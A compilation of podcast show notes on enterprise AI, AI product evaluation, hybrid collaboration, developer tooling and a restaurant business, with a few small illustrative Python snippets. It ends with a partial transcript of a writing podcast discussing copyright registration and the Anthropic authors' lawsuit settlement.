Cisco's Distance Zero rethinks hybrid collaboration with meeting equity, AI at the edge, and cinematic framing that keeps every participant “at eye height”—plus live 3D object discussion with Apple Vision Pro. SVP/GM Snorre Kjesbu explains how Cisco defines “Distance Zero”: everyone gets a true seat at the table—being seen, heard, and included in the room dynamics, whether they're remote or on-site. Subtle but powerful touches—like equalizing participant size and eye level—remove hierarchy cues and improve equity. He frames where hybrid work stands now: bring people together for creativity, mentoring, culture, and serendipity (yes, the coffee line matters), and let focused grind work happen anywhere. For offices to “earn the commute,” rooms must outperform home setups—for those in the room and those remote. Technically, this is enabled by a decade of AI/ML at the edge (a long-running partnership with Nvidia), now combined with newer large-language-model capabilities. Cisco's “cinematic” system behaves like an AI producer—understanding who's speaking and how a conversation moves—while noise suppression can differentiate lawnmowers, dogs, and even prioritize a specific speaker's voice. On accessibility, live translation, captions, and annotation lower barriers for varied accents and learning needs. IT and facilities teams also get AI “superpowers” for reliability and scale since collaboration is now mission-critical. Kjesbu notes that these capabilities are largely available on existing deployments (backward compatible where possible, with cloud assist), and adoption is strong: features like cinematic framing are on in 100% of meetings where available, and LLM-powered summaries, actions, and translation are surging. If this helped clarify the future of hybrid collaboration, like the video, leave a comment with your biggest meeting-equity challenge, and subscribe for more deep dives on accessible, human-centered workplace tech. 
Cisco Distance Zero, meeting equity, hybrid collaboration, AI at the edge, cinematic framing, Webex meetings, Apple Vision Pro 3D, Nvidia partnership, live translation, captions and annotation, noise suppression, remote work, earn the commute, inclusive meetings, IT manageability, voice optimization, backward compatibility, employee experience, collaboration devices Learn more about your ad choices. Visit megaphone.fm/adchoices
"85% of AI use cases are being evaluated by the engineer who built it saying, 'yep, seemed to work pretty well.' If you're gonna build a system that's going to be critical to the business, that's going to be important that it gets it right, then you can't do that without evaluations." - Craig Wiley

Fresh out of the studio, Craig Wiley, Senior Director of Product Management at Databricks, who leads Mosaic AI, joins us to discuss the forefront of enterprise AI, from model development to deployment at scale. Beginning with his career journey in ML operations, Craig explained how he recognized the critical connection between data and AI layers that could deliver order-of-magnitude acceleration in development cycles. Emphasizing the transition from classical ML operations to LLM operations, he showcased how Databricks' unified platform eliminates training-serving skew through data lineage capabilities and supports both fine-tuning and RAG approaches depending on industrial use case requirements. Highlighting compelling customer success stories, including Suncorp's employee productivity platform and AstraZeneca's transformation of 400,000 clinical trial documents into queryable insights, Craig revealed a striking reality about enterprise AI evaluation: 85% of AI use cases are being evaluated only by the engineers who built them, reinforcing that proper evaluation frameworks remain foundational for trustworthy AI implementation. He concluded by introducing Agent Bricks as Databricks' evaluation-centric approach to building production agents, emphasizing that model flexibility and rigorous testing are essential for enterprises moving from experimentation to production, while sharing his vision that the industry must evolve from the "year of agents" to the "year of evaluation and quality."
Episode Highlights:
[00:00] Quote of the Day by Craig Wiley
[01:21] How Craig Wiley started his work in ML Ops that led him to Databricks
[02:43] Data and AI layer connection creates order-of-magnitude acceleration
[03:47] Mosaic AI acquisition expanded Gen AI solution capabilities
[04:38] Classical ML statistics versus Gen AI evaluation challenges
[05:48] Mosaic AI covers end-to-end from data ingestion
[07:12] Training-serving skew eliminated through unified platform lineage
[08:51] Fine tuning versus RAG depends on use case
[10:49] Industrial agents benefit from fine-tuned smaller models
[12:44] Common governance scheme covers tables through model access
[13:52] Agent Bricks prioritizes accuracy over simplicity alone
[15:44] Model flexibility crucial for speed and accuracy optimization
[16:54] AB testing different models shows immediate performance differences
[17:59] Suncorp and AstraZeneca demonstrate diverse AI applications
[19:37] Asia Pacific shows aggressive AI adoption strategies
[20:59] CFO approval requires proven agent effectiveness evaluation
[22:00] 85% of AI cases evaluated only by building engineer
[23:20] Model agnostic approach beats single-vendor AI strategies
[24:12] Industry terminology evolves rapidly from RAG to agents
[25:39] Customer creativity with governance capabilities inspires product development

Profile: Craig Wiley, Senior Director of Product Management at Databricks and Mosaic AI
LinkedIn: https://www.linkedin.com/in/craigwiley/

Podcast Information: Bernard Leong hosts and produces the show. The intro and end music is "Energetic Sports Drive." G. Thomas Craig mixed and edited the episode in both video and audio format. Here are the links to watch or listen to our podcast.
Analyse Asia Main Site: https://analyse.asia Analyse Asia Spotify: https://open.spotify.com/show/1kkRwzRZa4JCICr2vm0vGl Analyse Asia Apple Podcasts: https://podcasts.apple.com/us/podcast/analyse-asia-with-bernard-leong/id914868245 Analyse Asia LinkedIn: https://www.linkedin.com/company/analyse-asia/ Analyse Asia X (formerly known as Twitter): https://twitter.com/analyseasia Sign Up for Our This Week in Asia Newsletter: https://www.analyse.asia/#/portal/signup Subscribe Newsletter on LinkedIn https://www.linkedin.com/build-relation/newsletter-follow?entityUrn=7149559878934540288
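Craig's warning that "you can't do that without evaluations" can be grounded with even a tiny harness: score the model against a fixed test set instead of the building engineer eyeballing outputs. A minimal sketch, assuming a callable model and exact-match grading (the toy model and cases here are illustrative; production systems like the ones discussed use far richer metrics):

```python
from typing import Callable

def run_eval(model: Callable[[str], str], cases: list[tuple[str, str]]) -> float:
    """Return the fraction of test cases where the model's answer
    exactly matches the expected answer."""
    passed = sum(1 for prompt, expected in cases if model(prompt).strip() == expected)
    return passed / len(cases)

# Hypothetical stand-in model and test set, for illustration only.
def toy_model(prompt: str) -> str:
    return {"2+2": "4", "capital of France": "Paris"}.get(prompt, "unknown")

cases = [("2+2", "4"), ("capital of France", "Paris"), ("3*3", "9")]
score = run_eval(toy_model, cases)  # 2 of 3 cases pass
```

Even this crude score is repeatable and comparable across model versions, which is what "seemed to work pretty well" is not.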
At PyData Berlin, community members and industry voices highlighted how AI and data tooling are evolving across knowledge graphs, MLOps, small-model fine-tuning, explainability, and developer advocacy.

- Igor Kvachenok (Leuphana University / ProKube) combined knowledge graphs with LLMs for structured data extraction in the polymer industry, and noted how MLOps is shifting toward LLM-focused workflows.
- Selim Nowicki (Distill Labs) introduced a platform that uses knowledge distillation to fine-tune smaller models efficiently, making model specialization faster and more accessible.
- Gülsah Durmaz (Architect & Developer) shared her transition from architecture to coding, creating Python tools for design automation and volunteering with PyData through PyLadies.
- Yashasvi Misra (Pure Storage) spoke on explainable AI, stressing accountability and compliance, and shared her perspective as both a data engineer and active Python community organizer.
- Mehdi Ouazza (MotherDuck) reflected on developer advocacy through video, workshops, and branding, showing how creative communication boosts adoption of open-source tools like DuckDB.

Igor Kvachenok
Master's student in Data Science at Leuphana University of Lüneburg, writing a thesis on LLM-enhanced data extraction for the polymer industry. Builds RDF knowledge graphs from semi-structured documents and works at ProKube on MLOps platforms powered by Kubeflow and Kubernetes.
Connect: https://www.linkedin.com/in/igor-kvachenok/

Selim Nowicki
Founder of Distill Labs, a startup making small-model fine-tuning simple and fast with knowledge distillation. Previously led data teams at Berlin startups like Delivery Hero, Trade Republic, and Tier Mobility. Sees parallels between today's ML tooling and dbt's impact on analytics.
Connect: https://www.linkedin.com/in/selim-nowicki/

Gülsah Durmaz
Architect turned developer, creating Python-based tools for architectural design automation with Rhino and Grasshopper. Active in PyLadies and a volunteer at PyData Berlin, she values the community for networking and learning, and aims to bring ML into architecture workflows.
Connect: https://www.linkedin.com/in/gulsah-durmaz/

Yashasvi (Yashi) Misra
Data Engineer at Pure Storage, community organizer with PyLadies India, PyCon India, and Women Techmakers. Advocates for inclusive spaces in tech and speaks on explainable AI, bridging her day-to-day in data engineering with her passion for ethical ML.
Connect: https://www.linkedin.com/in/misrayashasvi/

Mehdi Ouazza
Developer Advocate at MotherDuck, formerly a data engineer, now focused on building community and education around DuckDB. Runs popular YouTube channels ("mehdio DataTV" and "MotherDuck") and delivered a hands-on workshop at PyData Berlin. Blends technical clarity with creative storytelling.
Connect: https://www.linkedin.com/in/mehd-io/
Bilal Jogi is the marketing director of the Royal Nawaab Pyramid Indian restaurant in Stockport. It's the biggest in the UK. He markets at scale, and this podcast contains some of the secrets as to why they have hit the ground running in this iconic building.

Summary of the Podcast

Introduction to Bilal Jogi and the Royal Nawaab Pyramid
Bilal Jogi, the marketing director for the Royal Nawaab Pyramid / Royal Nawaab Group restaurant chain, is introduced. He provides an overview of the group's affordable luxury Indian/Pakistani cuisine concept, featuring a large buffet with live cooking in open kitchens.

The iconic Stockport Pyramid restaurant
Bilal discusses the group's recent takeover and transformation of the iconic Stockport Pyramid building, which had been derelict for years. He shares details on the scale of the project, the local suppliers and craftspeople involved, and the challenges of filling such a large space.

Marketing and customer experience strategies
Bilal explains the group's innovative marketing approach, focusing on building anticipation and curiosity through social media, influencer partnerships, and providing an exceptional customer experience. He emphasizes the importance of great service, a diverse menu, and creating reasons for customers to return.

Expansion plans and target demographics
Bilal outlines the group's expansion plans, including a focus on corporate catering and events, as well as potential future acquisitions like a golf course or hotel. He also shares insights into the group's target customer demographics, which are predominantly non-Asian families.

The Next 100 Days Podcast Co-Hosts

Graham Arrowsmith
Graham founded Finely Fettled ten years ago to help business owners and marketers market to affluent and high-net-worth customers. He's the founder of MicroYES, a Partner for MeclabsAI, where he introduces AI Agents that you can talk to, that increase engagement, dwell time, leads, and conversions. Now, Graham is offering Answer Engine Optimisation that gets you ready to be found by LLM search.

Kevin Appleby
Kevin specialises in finance transformation and implementing business change. He's the COO of GrowCFO, which provides both community and CPD-accredited training designed to grow the next generation of finance leaders. You can find Kevin on LinkedIn and at kevinappleby.com.
Hamel Husain and Shreya Shankar teach the world's most popular course on AI evals and have trained over 2,000 PMs and engineers (including many teams at OpenAI and Anthropic). In this conversation, they demystify the process of developing effective evals, walk through real examples, and share practical techniques that'll help you improve your AI product.

What you'll learn:
1. WTF evals are
2. Why they've become the most important new skill for AI product builders
3. A step-by-step walkthrough of how to create an effective eval
4. A deep dive into error analysis, open coding, and axial coding
5. Code-based evals vs. LLM-as-judge
6. The most common pitfalls and how to avoid them
7. Practical tips for implementing evals with minimal time investment (30 minutes per week after initial setup)
8. Insight into the debate between "vibes" and systematic evals

Brought to you by:
Fin—The #1 AI agent for customer service
Dscout—The UX platform to capture insights at every stage: from ideation to production
Mercury—The art of simplified finances

Where to find Shreya Shankar:
• X: https://x.com/sh_reya
• LinkedIn: https://www.linkedin.com/in/shrshnk/
• Website: https://www.sh-reya.com/
• Maven course: https://bit.ly/4myp27m

Where to find Hamel Husain:
• X: https://x.com/HamelHusain
• LinkedIn: https://www.linkedin.com/in/hamelhusain/
• Website: https://hamel.dev/
• Maven course: https://bit.ly/4myp27m

In this episode, we cover:
(00:00) Introduction to Hamel and Shreya
(04:57) What are evals?
(09:56) Demo: Examining real traces from a property management AI assistant
(16:51) Writing notes on errors
(23:54) Why LLMs can't replace humans in the initial error analysis
(25:16) The concept of a "benevolent dictator" in the eval process
(28:07) Theoretical saturation: when to stop
(31:39) Using axial codes to help categorize and synthesize error notes
(44:39) The results
(46:06) Building an LLM-as-judge to evaluate specific failure modes
(48:31) The difference between code-based evals and LLM-as-judge
(52:10) Example: LLM-as-judge
(54:45) Testing your LLM judge against human judgment
(01:00:51) Why evals are the new PRDs for AI products
(01:05:09) How many evals you actually need
(01:07:41) What comes after evals
(01:09:57) The great evals debate
(01:15:15) Why dogfooding isn't enough for most AI products
(01:18:23) OpenAI's Statsig acquisition
(01:23:02) The Claude Code controversy and the importance of context
(01:24:13) Common misconceptions around evals
(01:22:28) Tips and tricks for implementing evals effectively
(01:30:37) The time investment
(01:33:38) Overview of their comprehensive evals course
(01:37:57) Lightning round and final thoughts

LLM Log Open Codes Analysis Prompt:
Please analyze the following CSV file. There is a metadata field which has a nested field called z_note that contains open codes for analysis of LLM logs that we are conducting. Please extract all of the different open codes. From the _note field, propose 5-6 categories that we can create axial codes from.

Referenced:
• Building eval systems that improve your AI product: https://www.lennysnewsletter.com/p/building-eval-systems-that-improve
• Mercor: https://mercor.com/
• Brendan Foody on LinkedIn: https://www.linkedin.com/in/brendan-foody-2995ab10b
• Nurture Boss: https://nurtureboss.io/
• Braintrust: https://www.braintrust.dev/
• Andrew Ng on X: https://x.com/andrewyng
• Carrying Out Error Analysis: https://www.youtube.com/watch?v=JoAxZsdw_3w
• Julius AI: https://julius.ai/
• Brendan Foody on X—"evals are the new PRDs": https://x.com/BrendanFoody/status/1939764763485171948
• Who Validates the Validators?
Aligning LLM-Assisted Evaluation of LLM Outputs with Human Preferences: https://dl.acm.org/doi/abs/10.1145/3654777.3676450
• Lenny's post on X about evals: https://x.com/lennysan/status/1909636749103599729
• Statsig: https://statsig.com/
• Claude Code: https://www.anthropic.com/claude-code
• Cursor: https://cursor.com/
• Occam's razor: https://en.wikipedia.org/wiki/Occam%27s_razor
• Frozen: https://www.imdb.com/title/tt2294629/
• The Wire on HBO: https://en.wikipedia.org/wiki/The_Wire

Recommended books:
• Pachinko: https://www.amazon.com/Pachinko-National-Book-Award-Finalist/dp/1455563935
• Apple in China: The Capture of the World's Greatest Company: https://www.amazon.com/Apple-China-Capture-Greatest-Company/dp/1668053373/
• Machine Learning: https://www.amazon.com/Machine-Learning-Tom-M-Mitchell/dp/1259096955
• Artificial Intelligence: A Modern Approach: https://www.amazon.com/Artificial-Intelligence-Modern-Approach-Global/dp/1292401133/

Production and marketing by https://penname.co/. For inquiries about sponsoring the podcast, email podcast@lennyrachitsky.com.

Lenny may be an investor in the companies discussed.

My biggest takeaways from this conversation: To hear more, visit www.lennysnewsletter.com
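The step at (54:45), testing your LLM judge against human judgment, reduces to measuring agreement on a human-labeled sample of traces. A minimal sketch with made-up labels, reporting raw agreement plus true-positive and true-negative rates so any bias in the judge is visible (the labels below are purely illustrative):

```python
def judge_agreement(human: list[bool], judge: list[bool]) -> dict:
    """Compare judge verdicts to human labels (True = trace passes)."""
    assert len(human) == len(judge)
    agree = sum(h == j for h, j in zip(human, judge)) / len(human)
    pos = [j for h, j in zip(human, judge) if h]       # human said pass
    neg = [j for h, j in zip(human, judge) if not h]   # human said fail
    tpr = sum(pos) / len(pos) if pos else float("nan")        # judge agrees on passes
    tnr = sum(not j for j in neg) / len(neg) if neg else float("nan")  # judge catches failures
    return {"agreement": agree, "tpr": tpr, "tnr": tnr}

# Illustrative only: 6 traces graded by a human and by the LLM judge.
human = [True, True, True, False, False, False]
judge = [True, True, False, False, False, True]
stats = judge_agreement(human, judge)
```

Reporting TPR and TNR separately matters: a judge that rubber-stamps everything "pass" can still show high raw agreement if most traces pass.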
How has AI changed coding with Visual Studio Code? Carl and Richard talk to James Montemagno about his experiences using the various LLM models available today with Visual Studio Code to build applications. James talks about the differences in approaches between Visual Studio and Visual Studio Code when it comes to AI tooling, and how those tools continue to evolve. The conversation also digs into how different people use AI tools to answer questions about errors, generate code, and manage projects. There's no one right way - you can experiment for yourself to get more done in less time!
Intel and Nvidia are teaming up for multiple reasons, OpenAI are planning to build data centers and use a ludicrous amount of power, LLM hallucinations aren't going away, and how long we keep servers and hard drives in production.

Plugs: Support us on Patreon and get an ad-free RSS feed with early episodes […]
Nathan Snell is a founder, executive, and three-time entrepreneur best known for co-founding nCino, the global leader in cloud banking, and now Raleon, an AI retention platform for DTC brands. With 15+ years in fintech, marketing technology, and AI, Nathan has built products that don't just scale companies, they transform entire markets, including a 10-figure exit.

With Raleon, Nathan is reimagining retention for Ecommerce. Instead of bloated teams or endless manual work, Raleon acts like a teammate, helping DTC brands and agencies handle retention 50% faster while driving more revenue. From campaign planning to segmentation, it automates the tactical grind so marketers can focus on strategy and growth.

Nathan's story blends technical expertise with market-shaping vision. From scaling nCino into a public company, to investing as an active angel, to now tackling one of Ecommerce's biggest pain points, retention, he's seen how AI can accelerate results but still requires human pilots to go beyond "average" output.

Whether you're building a lean DTC team, rethinking retention marketing, or trying to cut through the hype of AI, Nathan offers a grounded look at how to combine automation, brand taste, and strategy to drive the next era of Ecommerce growth.

In This Conversation We Discuss:
[00:22] Intro
[00:46] Building expertise in workflow automation
[01:46] Experimenting with LLMs in workflows
[03:18] Comparing AI models for DTC marketing
[04:01] Starting email AI with copywriting
[05:08] Fine-tuning prompts for better outputs
[06:40] Elevating outputs with better context setting
[08:08] Analyzing past campaigns to guide outputs
[09:50] Stay updated with new episodes
[10:02] Automating segmentation and copy at once
[11:57] Recognizing AI delivers average by default
[13:38] Editing outputs instead of chasing perfect prompts
[15:20] Connecting Klaviyo and Shopify for campaigns
[17:41] Automating learning cycles across campaigns
[19:14] Guiding systems instead of replacing teams

Resources:
Subscribe to Honest Ecommerce on Youtube
Automate DTC retention marketing with AI: raleon.io/
Follow Nathan Snell: linkedin.com/in/nathansnell

If you're enjoying the show, we'd love it if you left Honest Ecommerce a review on Apple Podcasts. It makes a huge impact on the success of the podcast, and we love reading every one of your reviews!
How can artificial intelligence make itself more efficient? This week, Technology Now delves into the concept of solution-based efficiency, how it can be applied to new and emerging technologies, and the importance of expecting the unexpected. John Frey, Senior Director and Chief Technologist of Sustainable Transformation for HPE, tells us more.

This is Technology Now, a weekly show from Hewlett Packard Enterprise. Every week, hosts Michael Bird and Aubrey Lovell look at a story that's been making headlines, take a look at the technology behind it, and explain why it matters to organizations.

HPE AI Sustainability Whitepaper: https://www.hpe.com/psnow/doc/a50013815enw

Sources:
https://homepages.math.uic.edu/~leon/mcs425-s08/handouts/char_freq2.pdf
https://www.morsecodeholistic.com/american-morse-code-translator
https://www.bbc.com/news/business-47460499
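The letter-frequency and Morse code sources above point at a classic example of efficiency by design: Morse gives the most frequent letters the shortest codes, so the average message costs far less than a fixed-length scheme. A small illustration (a handful of letters only, with rounded English frequencies, so the numbers are indicative rather than exact):

```python
# International Morse symbol counts (dots/dashes) for a few letters,
# alongside rough English letter frequencies.
MORSE_LEN = {"e": 1, "t": 1, "a": 2, "o": 3, "q": 4, "z": 4}
FREQ = {"e": 0.127, "t": 0.091, "a": 0.082, "o": 0.075, "q": 0.001, "z": 0.001}

def avg_code_length(lengths: dict, freq: dict) -> float:
    """Frequency-weighted average number of symbols per letter."""
    total = sum(freq.values())
    return sum(lengths[c] * freq[c] for c in lengths) / total

weighted = avg_code_length(MORSE_LEN, FREQ)
fixed = 4  # a fixed-length code over these letters would need up to 4 symbols
```

The weighted average lands well under the fixed-length cost: the same principle (spend resources where the workload actually is) is what solution-based efficiency applies to AI systems.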
Alice for Power BI (https://alice.dev/alice-power-bi/)
Mike on X (https://x.com/dominucco)
Mike on BlueSky (https://bsky.app/profile/dominucco.bsky.social)
Coder on X (https://x.com/coderradioshow)
Show Discord (https://discord.gg/k8e7gKUpEp)
Alice & Custom Dev (https://alice.dev)
In this episode, Daniel and Chris are joined by Chris Aquino, software engineer at Thunderbird, to hear the story of how they developed a privacy-preserving AI executive assistant. They discuss various design decisions including remote (but confidential) inference, local encryption, and model selection. Chris A. does an amazing job describing the journey from "let the big LLM do everything" to splitting apart the workflow to be handled by multiple models.

Featuring:
Chris Aquino – LinkedIn
Chris Benson – Website, LinkedIn, Bluesky, GitHub, X
Daniel Whitenack – Website, GitHub, X

Links:
Thunderbird
Thunderbird Pro

Sponsors:
Shopify – The commerce platform trusted by millions. From idea to checkout, Shopify gives you everything you need to launch and scale your business—no matter your level of experience. Build beautiful storefronts, market with built-in AI tools, and tap into the platform powering 10% of all U.S. eCommerce. Start your one-dollar trial at shopify.com/practicalai

Upcoming Events: Join us at the Midwest AI Summit on November 13 in Indianapolis to hear world-class speakers share how they've scaled AI solutions. Don't miss the AI Engineering Lounge, where you can sit down with experts for hands-on guidance. Reserve your spot today!

Register for upcoming webinars here!
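The journey from "let the big LLM do everything" to a split workflow can be sketched as a simple router: lightweight steps go to a small local model, and only what genuinely needs a large model is sent to (confidential) remote inference. Everything below (the task names and the model stubs) is a hypothetical illustration of that pattern, not Thunderbird's actual code:

```python
from typing import Callable

# Hypothetical backends; real ones would call a local runtime
# or a confidential remote inference endpoint.
def small_local_model(task: str, text: str) -> str:
    return f"local:{task}"

def large_remote_model(task: str, text: str) -> str:
    return f"remote:{task}"

# Route cheap, privacy-sensitive steps locally; reserve the big model for drafting.
ROUTES: dict[str, Callable[[str, str], str]] = {
    "classify_priority": small_local_model,
    "extract_dates": small_local_model,
    "draft_reply": large_remote_model,
}

def run(task: str, text: str) -> str:
    handler = ROUTES.get(task, small_local_model)  # default to the cheap local path
    return handler(task, text)
```

Defaulting unknown tasks to the local path is one way to keep the privacy-preserving behavior the episode describes as the baseline rather than the exception.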
The best way to cook just got better. Go to http://HelloFresh.com/THEORIESOFEVERYTHING10FM now to Get 10 Free Meals + a Free Item for Life! *One per box with active subscription. Free meals applied as discount on first box, new subscribers only, varies by plan.

Get 50% off Claude Pro, including access to Claude Code, at http://claude.ai/theoriesofeverything

For the first time on TOE, I sit down with professors Anil Seth and Michael Levin to test the brain-as-computer metaphor and whether algorithms can ever capture life/mind. Anil argues the "software vs. hardware" split is a blinding metaphor—consciousness may be bound to living substrate—while Michael counters that machines can tap the same platonic space biology does. We tour their radical lab work—xenobots, compositional agents, and interfaces that bind unlike parts—and probe psychophysics in strange new beings, "islands of awareness," and what Levin's bubble-sort "side quests" imply for reading LLM outputs. Anil brings information theory and Granger causality into the mix to rethink emergence and scale—not just computation. Along the way: alignment, agency, and how to ask better scientific questions. If you're into AI/consciousness, evolution without programming, or whether silicon could ever feel—this one's for you.

Timestamps:
00:00 - Anil Seth & Michael Levin: Islands of Consciousness & Xenobots
08:24 - Substrate Dependence: Why Biology Isn't Just 'Wetware'
13:13 - Beyond Algorithms: Do Machines Tap Into a 'Platonic Space'?
21:46 - The Ghost in the Algorithm: Emergent Agency in Bubble Sort
29:26 - Degeneracy: The Biological Principle AI is Missing
36:34 - The Multiplicity of Agency: Are Your Cells Conscious?
43:24 - Unconscious Processing or Inaccessible Consciousness? The Split-Brain Problem
49:32 - The Ultimate Experiment to Decode Consciousness
57:31 - A Counter-Intuitive Discovery: Consciousness is *Less* Emergent
1:03:39 - Psychedelics, LLMs, and the Frontiers of Surprise
Hey ho, welcome to the Publishing Nerd Corner, where we dive into the more technical aspects of authorship.

Jess here. I love it when Sarina schools me on all things publishing nerdery, so we decided to make it official and create a whole new series. I have a long list of things I want her to explain for us, so stay tuned for more. In the meantime, our first Nerd Corner chat is a timely episode about the Anthropic case specifically, and about registering your copyright. We're going to discuss:

* The benefits of registering your copyright with the United States Copyright Office.
* The possibility of a settlement in the Anthropic lawsuit, and what that could mean for authors.
* Why copyright registration will be part of any potential settlement.
* How to register your copyright.
* Did your publisher fulfill its obligation to register your copyright?

For more information about the benefits of copyright registration, see the Copyright Alliance. To register your copyright yourself, you'll need Copyright.gov. You will also want to read the Authors Guild post, "What Authors Need to Know About the Anthropic Settlement."

Hit that "play" button and nerd out with us for fifteen minutes! Transcript below!

EPISODE 466 - TRANSCRIPT

Jess Lahey
Hey, it's Jess Lahey. If you've been listening to the Hashtag AmWriting Podcast for any length of time, you know that, yes, I am a writer, but my true love, my deepest love, is combining writing with speaking. I get to go into schools, into community organizations, into nonprofits, into businesses, and do everything from lunch-and-learns, to community reads, to just teaching about the topics that I'm an expert in. From the topics in The Gift of Failure, engagement, learning, learning in the brain, cognitive development, getting kids motivated, and yes, the topic of over-parenting and what that does to kids' learning, to topics around The Addiction Inoculation, substance use prevention in kids, and what I've been doing lately that's the most fun for me, frankly, is combining the two topics. It makes the topic of substance use prevention more approachable, less scary, when we're talking about it in the context of learning and motivation and self-efficacy and competence and, yes, cognitive development. So if you have any interest in bringing me into your school, to your nonprofit, to your business, I would love to come. You can go to Jessicalahey.com. Look under the menu option "Speaking" and go down to "Speaking Inquiry." There's also a lot of information on my website about what I do. There's videos there about how I do it. Please feel free to get in touch. And I hope I get to come to your community. If you put in the speaking inquiry that you are a Hashtag AmWriting listener, we can talk about a discount. So that can be one of the bonuses for being a loyal and long-term listener to the Hashtag AmWriting Podcast. Hope to hear from you.

Multiple Speakers
Is it recording? Now it's recording. Yay! Go ahead. This is the part where I stare blankly at the microphone. Try to remember what I'm supposed to be doing. All right, let's start over. Awkward pause. I'm going to rustle some papers. Okay. Now, one, two, three.

Jess Lahey
Hey, welcome to the Hashtag AmWriting Podcast. I'm Jess Lahey, your host, along with another host today—this is going to be super fun. We are the podcast about writing: short things, long things, poetry, prose, book proposals, querying agents—we're basically the podcast about getting the work done. I am Jess Lahey. I'm the author of The Gift of Failure and The Addiction Inoculation.
And you can find my journalism at The New York Times, The Washington Post, and The Atlantic.

Sarina Bowen
And I'm Sarina Bowen, the author of many contemporary novels, and also a council member on The Authors Guild. And it is in that spirit that we are bringing you a special episode today, which we're calling part of our Publishing Nerd Corner segment.

Jess Lahey
Our favorite stuff.

Sarina Bowen
Yeah, so publishing nerd stuff. Here we go, and the topic is pretty timely.

Jess Lahey
And juicy.

Sarina Bowen
And juicy. We're talking about why authors copyright their work, what it means, and how it ties into everything going on with the Anthropic lawsuit and potential settlement.

Jess Lahey
So, backing up, could you tell us a little bit about the Anthropic lawsuit, and sort of what it was about, and why everybody's talking about it right now?

Sarina Bowen
Of course. So, Anthropic is an AI company, a Large Language Model company, just like OpenAI, the company behind ChatGPT. Anthropic are the people who make Claude, but all the big AI companies are being sued right now, including Meta, including Microsoft, or...

Jess Lahey
Google. Google.

Sarina Bowen
Yeah, sorry.

Jess Lahey
Not Microsoft.

Sarina Bowen
And also the new one is there's a new lawsuit against Apple. So, basically, everybody who went out and made a big LLM model using stolen, pirated books and articles downloaded from the Internet is being sued variously by different organizations, and it looks like the Anthropic lawsuit might be resolved first.

Jess Lahey
Okay, so what are they being sued for?

Sarina Bowen
They're being sued for a couple of things.
First is the wholesale piracy of lots of books downloaded off the internet, and second, for feeding all of those books into their models to teach them how to speak and compose.

Jess Lahey
A while ago, weren't there some—I think some—internal memos around the whole Meta thing where, essentially, they acknowledged how much it would cost to purchase legally all of the things they needed to train their large language models, and they decided, “Wow, that would be a lot of money.”

Sarina Bowen
Right.

Jess Lahey
“We'll just steal them.”

Sarina Bowen
We don't want to deal with copyright. Well, specifically, the most interesting internal memos that we've seen have been involved in the Meta case, which we're not really talking about tonight, but yeah, there are some big smoking guns out there. But I wanted to take this opportunity to talk about the practical nature of copyrighting your work, because there's a potential settlement on the table that's taking shape in terms of how authors will be paid some portion of a $1.5 billion settlement from this Anthropic suit, potentially, and whether or not you have a registered copyright on your book is going to matter. So, first of all, in this case, the judge did rule—well, we wanted him to rule—that using these books to train the model was not a fair use situation.

Jess Lahey
Right. They were trying to say, “No, no, this is just fair use.”

Sarina Bowen
Right.

Jess Lahey
“We shouldn't have to pay anybody.”

Sarina Bowen
And unfortunately, we don't have a ruling in favor of this concept yet, and The Authors Guild cares very much that it's not fair use and will continue to fight for that. But what we did get in this case is a ruling that is actually quite powerful and important to the whole conversation, which is that the judge said that Anthropic downloading all of these titles—these millions of stolen books—from a piracy site was, in fact, illegal and that they are going to have to pay. So the ruling was against them.
So now this is a class-action suit, and in a class-action suit, all of the parties in the class—you can opt out if you want to, like if you're an author who would rather sue them individually, you can still do that. But it looks like, in defining the class of who is eligible to receive a payout, you're going to have to have a registered copyright. Your copyright will have to have been registered within five years of publication, and also before they downloaded it.

Jess Lahey
So, to clarify, some of the questions I've seen floating around on the interwebs are about, “Oh, but there was that big list that was published by The Atlantic.” You could go to The Atlantic and just see, and “oh my gosh, I had six titles that were on that list. Does that mean that I'm going to get money for all of those titles?”

Sarina Bowen
Okay, well, that is a great question. And actually, I need to stipulate real quick that I am not a lawyer.

Jess Lahey
Right.

Sarina Bowen
You're a lawyer, and almost certainly I'm going to make an error when I'm speaking on this tonight. I have spent a lot of time listening in meetings about these things, so I feel comfortable enough to discuss it with you tonight. But, um, I'm going to make a mistake. So you need to check everything...

Jess Lahey
Right.

Sarina Bowen
…when you make your own legal decisions. So wait, what was the question?

Jess Lahey
So the question was about that big list at The Atlantic.

Sarina Bowen
Oh yeah!

Jess Lahey
That was like, what, 5 million titles or so?

Sarina Bowen
Well, that list was taken from a specific piracy site.

Jess Lahey
Right.

Sarina Bowen
But it doesn't tell us which titles the company actually downloaded, so only the company has that list. So, first of all, that database is sort of handy and interesting, but it is not definitive.

Jess Lahey
So do not count on looking at that list and saying, “Oh, I have six titles there, maybe I'll get a payout for all six titles.”

Sarina Bowen
Right.
So, um, but let's—we really need to talk about copyright registration, because there's so much misinformation floating around out there. So it's true that if you sit down right now and write something, you already own the copyright for it. So that's powerful—sort of—right? Um, but the point of registering your copyright—and these benefits are right on the Copyright Alliance website, so we're going to link to the copyright website—but, um, one of the primary reasons why people register is because registration is a necessary prerequisite for U.S. copyright owners to bring a copyright infringement suit in federal court. And of course, this is a federal court action, but also because statutory damages and attorneys' fees can only be sought if you have a registered copyright. If you just own your copyright without registering it, you can sue for damages, but the damages in a copyright suit are pretty hard to prove, or at least quantify. So that is why the statutory part of damages is what is being enacted in this judgment.

Jess Lahey
But Sarina, I have a publisher. Didn't my publisher register my copyright for me?

Sarina Bowen
Well, probably. My newer contracts all say the publisher must register them, and as far as I can tell, with those newer contracts, the publisher did. So, yay. But I do have an old contract from about 2014 that only says that the publisher may register it. And guess what—they didn't. So, first of all, you need to see—you can go to a different database, which is the U.S. government copyright database—and look yourself up and see if your book is in there. And honestly, if your publisher was supposed to register you, and they didn't, The Authors Guild would really like to hear from you, because they're sort of looking into this.
Suddenly, you know, in the last 10 days, there's a bunch of people who are like, “Oh my goodness, hang on, they didn't actually do it.” So that's something to think about, something to look at.

Jess Lahey
Yeah.

Sarina Bowen
